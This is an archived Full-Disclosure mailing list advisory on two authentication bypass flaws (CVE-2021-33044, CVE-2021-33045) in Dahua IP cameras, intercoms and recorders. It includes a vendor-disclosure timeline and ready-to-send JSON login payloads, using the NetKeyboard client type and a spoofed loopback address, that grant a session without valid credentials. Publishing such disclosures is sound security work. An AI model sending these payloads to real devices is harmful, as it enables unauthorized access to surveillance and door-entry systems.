lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <AM0PR08MB30121AB43A6344FBD4C6238CD0B09@AM0PR08MB3012.eurprd08.prod.outlook.com>
Date: Wed, 6 Oct 2021 00:06:55 +0000
From: bashis <mcw@...mail.eu>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] [Update]: Dahua Authentication bypass (CVE-2021-33044,
 CVE-2021-33045)

[STX]

Subject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)

Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (2021)
Limited Disclosure: September 6, 2021
Full Disclosure: October 6, 2021
PoC: https://github.com/mcw0/DahuaConsole

-=[Dahua]=-
Advisory: https://www.dahuasecurity.com/support/cybersecurity/details/957
Firmware: https://www.dahuasecurity.com/support/downloadCenter/firmware

-=[Timeline]=-
June 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@...uatech.com)
June 17, 2021: Sent reminder to Dahua PSIRT
June 18, 2021: Asked IPVM for help to get in contact with Dahua
June 18, 2021: Received ACK from IPVM, told they sent note to Dahua
June 19, 2021: ACK received from Dahua PSIRT, asked for additional details
June 19, 2021: Additional details including PoC sent
June 21, 2021: ACK received, vulnerabilites confirmed
June 23, 2021: Dahua PSIRT asked for "coordinated disclosure"
June 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now
June 24, 2021: Received CVE-2021-33044, I asked about the second CVE
July 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for "coordinated disclosure"
July 04, 2021: Confirmed "coordinated disclosure", once again
July 05, 2021: Dahua PSIRT tried convince me for "Full Disclosure" for vendor only, and "Limited Disclosure" for outside world
July 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before "Limited Disclosure" September 6, 2021.
               "Full Disclosure" will be October 6, 2021,
August 30, 2021: Dahua PSIRT asked to read my "Limited Disclosure" note
August 30, 2021: Sent my "Limited Disclosure" note
September 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates
September 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices
September 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware
September 2, 2021: Refused to provide details, as I do expect me to find firmware on their website
September 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches
September 6, 2021: Limited Disclosure
October 6, 2021: Full Disclosure


-=[NetKeyboard Vulnerability]=-

CVE-2021-33044

Vulnerability:
        "clientType": "NetKeyboard",
Vulnerable device types: IPC/VTH/VTO (tested)
Vulnerable Firmware: Those devices who do not support "NetKeyboard" functionality (older than June 2021)
Protocol: DHIP and HTTP/HTTPS

Details:
Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence will simply bypass authentication.

Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":<sessionID>}

[Example]
{
    "method": "global.login",
    "params":
    {
        "userName": "admin",
        "loginType": "Direct",
        "clientType": "NetKeyboard",
        "authorityType": "Default",
        "passwordType": "Default",
        "password": "Not Used"
    },
    "id": 1,
    "session": 0
}

-=[Loopback Vulnerability]=-

CVE-2021-33045

Vulnerability:
        "ipAddr": "127.0.0.1",
        "loginType": "Loopback",
        "clientType": "Local",

Vulnerable device types: IPC/VTH/VTO/NVR/DVR (tested)
Vulnerable Firmware: Firmware version older than beginning/mid 2020.
Protocol: DHIP

Details:
Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence pretends that the login request comes from "loopback" and will therefore bypass legitimate authentication.

Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":<sessionID>}


[Example]
Random MD5 with l/p: admin/admin
{
    "method": "global.login",
    "params":
    {
        "userName": "admin",
        "ipAddr": "127.0.0.1",
        "loginType": "Loopback",
        "clientType": "Local",
        "authorityType": "Default",
        "passwordType": "Default",
        "password": "[REDACTED]"
    },
    "id": 1,
    "session": 0
}

Plain text with l/p: admin/admin
{
    "method": "global.login",
    "params":
    {
        "userName": "admin",
        "ipAddr": "127.0.0.1",
        "loginType": "Loopback",
        "clientType": "Local",
        "authorityType": "Default",
        "passwordType": "Plain",
        "password": "admin"
    },
    "id": 1,
    "session": 0
}

[ETX]


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ